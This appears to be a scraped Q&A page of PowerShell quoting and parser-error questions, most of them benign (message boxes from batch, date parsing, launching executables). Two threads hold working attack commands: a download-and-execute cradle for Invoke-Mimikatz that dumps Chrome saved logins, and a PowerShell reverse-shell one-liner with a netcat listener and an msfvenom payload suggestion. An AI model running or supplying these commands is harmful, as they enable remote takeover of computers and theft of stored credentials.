How to execute PowerShell Net MessageBox in cmd/batch - powershell

I have a batch file with lot of stuff. I there is one Alert Window with info for user.
On Windows Pro I'm using Msg command for it and it works fine.
On Windows Home there is no Msg, so I got the idea to use PowerShell instead:
[System.Windows.Forms.MessageBox]::Show("my text")
which works fine in PowerShell.
-However, when I try to use it in batch or execute it directly in Cmd, I only get the text:
C:\Windows\System32>powershell {[System.Windows.Forms.MessageBox]::Show("\""my text"\"")}
[System.Windows.Forms.MessageBox]::Show("my text")
Or I get errors:
C:\Windows\System32>powershell -command [System.Windows.Forms.MessageBox]::Show("my text")
At line:1 char:41
+ [System.Windows.Forms.MessageBox]::Show(my text)
+ ~
Missing ')' in method call.
At line:1 char:41
+ [System.Windows.Forms.MessageBox]::Show(my text)
+ ~~
Unexpected token 'my' in expression or statement.
At line:1 char:48
+ [System.Windows.Forms.MessageBox]::Show(my text)
+ ~
Unexpected token ')' in expression or statement.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : MissingEndParenthesisInMethodCall
or
C:\Windows\System32>powershell -command "& {[System.Windows.Forms.MessageBox]::Show('my text')}"
Unable to find type [System.Windows.Forms.MessageBox].
At line:1 char:4
+ & {[System.Windows.Forms.MessageBox]::Show('my text')}
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (System.Windows.Forms.MessageBox:TypeName) [],
RuntimeException
+ FullyQualifiedErrorId : TypeNotFound
What should I do to get it to work?
(without rewriting the whole script to PowerShell, that is)

As TheMadTechnician stated, you may need to load it first.
This is effectively the same answer as theirs just over a couple of lines:
#Echo Off
PowerShell -Command^
"[Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms')|Out-Null;"^
"[System.Windows.Forms.MessageBox]::Show(\"my text\")"
Pause
…and whilst double quotes around my text is not necessary, I've used them to show you the escapes.

You need to load the type before you can invoke it. You can do this:
powershell -command "[reflection.assembly]::LoadWithPartialName('System.Windows.Forms')|out-null;[windows.forms.messagebox]::Show('my message')"

Related

Mimikatz - problem with handling spaces in the file path Dpapi::chrome [duplicate]

This question already has an answer here:
Powershell in Jenkins escaping characters for path
(1 answer)
Closed 1 year ago.
Why in mimikatz/kiwi cannot process first space when opening chrome database "Login Data" ?
Example:
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -Command "dpapi::chrome /in:\"%localappdata%\Google\Chrome\User Data\Default\Login Data\""
Error:
Invoke-Mimikatz : A positional parameter cannot be found that accepts argument 'Data\Default\Login'.
At line:1 char:146
+ ... katz.ps1'); Invoke-Mimikatz -Command "dpapi::chrome /in:\"%localappda ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidArgument: (:) [Invoke-Mimikatz], ParameterBindingException
+ FullyQualifiedErrorId : PositionalParameterNotFound,Invoke-Mimikatz
enter code here
I will be very happy if someone helps, I have already tried all.
You need to escape the " inside the string argument by doubling them ("") or prefixing them with a single ` (PowerShell doesn't care about \):
"dpapi::chrome /in:""%localappdata%\Google\Chrome\User Data\Default\Login Data"""
# or
"dpapi::chrome /in:`"%localappdata%\Google\Chrome\User Data\Default\Login Data`""

Execute PowerShell as batch file

I'm trying to run the below reverse shell PowerShell command using a .bat file.
powershell /w 1 "$c=new-object system.net.sockets.tcpclient('192.168.0.66',4777);$s=$c.GetStream();[byte[]]$b = 0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$o=(iex $d 2>&1|out-string);$z=$o + 'hacker> ' + (pwd).Path + '> ';$x = ([text.encoding]::ASCII).GetBytes($z);$s.Write($x,0,$x.Length);$s.Flush};$c.close()"
First, I start the netcat listener in Kali:
nc -vv -l -p 4777
I then run the PowerShell command, but I get the following error in Windows 10:
At line:1 char:112
+ ... 168.0.66',4777);$s=$c.GetStream();[byte[]]$b = 0..65535|:ASCII).GetByte ...
+ ~
Unexpected token ')' in expression or statement.
At line:1 char:160
+ ... 65535|:ASCII).GetBytes($z);$s.Write($x,0,$x.Length);$s.Flush};$c.clos ...
+ ~
Unexpected token '}' in expression or statement.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : UnexpectedToken
I've tried many possible ', " and ``` combinations and variations, both in and encasing the command. I'm totally stumped.
Found myself into the same problem. I wonder why a command that runs without errors in CMD doesn't work well if it's executed inside a .bat file. I doesn't make sense at all.
Metasploit is our friend here:
msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=4444 > 1.bat
Source:
https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/

how to execute an exe with variable value for path and arguments

I'm trying to execute in my powershell script the command below :
D:\Apps\Documentum\product\7.3\bin\idql.exe -udmadmin -pPassword dctm04 -RC:\temp\documentum\session_list.txt -w20 > C:\temp\documentum\session_logstash.txt
In my powershell script I do that:
$DOCBASE="dctm04"
$USER_DOCBASE="dmadmin"
$USER_PWD="Password01"
$IDQL_PATH="D:\Apps\Documentum\product\7.3\bin"
$QRY_SESSIONS="C:\temp\documentum\session_list.txt"
$QRY_LOG_SESSIONS="C:\temp\documentum\session_logstash.txt"
$IDQL_PATH\idql.exe -u$USER_DOCBASE -p$USER_PWD $DOCBASE -R$QRY_SESSIONS -w20 > $QRY_LOG_SESSIONS
But it doesn't work properly, I receive the error below :
At C:\temp\documentum\Generate.ps1:49 char:13
+ $IDQL_PATH\idql.exe -u$USER_DOCBASE -p$USER_PWD $DOCBASE -R$QRY_SESSIONS -w20 ...
+ ~~~~~~~~~
Unexpected token '\idql.exe' in expression or statement.
+ CategoryInfo : ParserError: (:) [], ParseException
+ FullyQualifiedErrorId : UnexpectedToken
I think, i don't use variable properly on my command.
Please note my powershell version is :
PS C:\temp\documentum> $PSVersionTable.PSVersion
Major Minor Build Revision
----- ----- ----- --------
4 0 -1 -1
could you give me the solution in order to solve my problem
The reason is that combining a string to executable name makes no sense to Powershell's parsing rules. Use the call operator & or Invoke-Item. Like so,
$ssms="C:\Program Files (x86)\Microsoft SQL Server\140\Tools\Binn\ManagementStudio"
PS C:\> $ssms\ssms.exe
At line:1 char:6
+ $ssms\ssms.exe
+ ~~~~~~~~~
Unexpected token '\ssms.exe' in expression or statement.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : UnexpectedToken
C:\>& $ssms\ssms.exe
# Launches SSMS succesfully
C:\>Invoke-Item $ssms\ssms.exe
# Launches SSMS succesfully
There's nice a document about running executables.

How to create a messagebox as an argument to powershell.exe?

How can I provide arguments to powershell.exe in order to spawn a message box? The key phrase here is arguments to powershell.exe, not from within a .ps1 script and also not from within the Powershell prompt itself. I currently have this but it is producing errors:
powershell.exe -Command "[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms"); [System.Windows.Forms.MessageBox]::Show("Test!!!")"
I have also tried without -Command and with Invoke-Expression, with and without double quotes surrounding.
Errors created:
At line:1 char:51
+ [System.Reflection.Assembly]::LoadWithPartialName(System.Windows.Form ...
+ ~
Missing ')' in method call.
At line:1 char:51
+ ... eflection.Assembly]::LoadWithPartialName(System.Windows.Forms); [Syst ...
+ ~~~~~~~~~~~~~~~~~~~~
Unexpected token 'System.Windows.Forms' in expression or statement.
At line:1 char:71
+ ... flection.Assembly]::LoadWithPartialName(System.Windows.Forms); [Syste ...
+ ~
Unexpected token ')' in expression or statement.
At line:1 char:114
+ ... stem.Windows.Forms); [System.Windows.Forms.MessageBox]::Show(Test!!!)
+ ~
Missing ')' in method call.
At line:1 char:114
+ ... stem.Windows.Forms); [System.Windows.Forms.MessageBox]::Show(Test!!!)
+ ~~~~~~~
Unexpected token 'Test!!!' in expression or statement.
At line:1 char:121
+ ... stem.Windows.Forms); [System.Windows.Forms.MessageBox]::Show(Test!!!)
+ ~
Unexpected token ')' in expression or statement.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : MissingEndParenthesisInMethodCall
This is a quotation problem. Using the same double quote " in both argument and its contents messes up the content. As a work-around, use single quotes within the Powershell command and double quotes around the whole -Command parameter. Like so,
powershell.exe -Command "[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); [System.Windows.Forms.MessageBox]::Show('Test!!!')"
That being said, Add-Type -AssemblyName is IMAO prettier way to load assemblies. Like so,
powershell.exe -Command "add-type -assemblyname System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('Test!!!')"

Converting time stamp in powershell

I get the below time stamp from API response how do i convert this to human readable text in power shell, i tried below but it is throwing error.
PS C:\Users\foobar\ddd> [datetime]::ParseExact('20100804T104413+0100','
yyyyMMdd'T'HHmmsszzz',[System.Globalization.CultureInfo]::InvariantCulture)
At line:1 char:57
+ [datetime]::ParseExact('20100804T104413+0100','yyyyMMdd'T'HHmmsszzz', ...
+ ~
Missing ')' in method call.
At line:1 char:57
+ ... me]::ParseExact('20100804T104413+0100','yyyyMMdd'T'HHmmsszzz',[System ...
+ ~~~~~~~~~~~~
Unexpected token 'T'HHmmsszzz'' in expression or statement.
At line:1 char:69
+ ... e]::ParseExact('20100804T104413+0100','yyyyMMdd'T'HHmmsszzz',[System. ...
+ ~
Missing argument in parameter list.
At line:1 char:122
+ ... dd'T'HHmmsszzz',[System.Globalization.CultureInfo]::InvariantCulture)
+ ~
Unexpected token ')' in expression or statement.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : MissingEndParenthesisInMethodCall
20170125T153341-050020170125T153344-0500
Your only problem seems to be the errant (lack of) quoting of T in your code; removing it seems to work fine:
[datetime]::ParseExact('20100804T104413+0100','yyyyMMddTHHmmsszzz', $null)
Also, since you're providing a format string in which all characters are specified individually and numerically, you needn't specify a culture (passing $null, which defaults to the current culture, will do).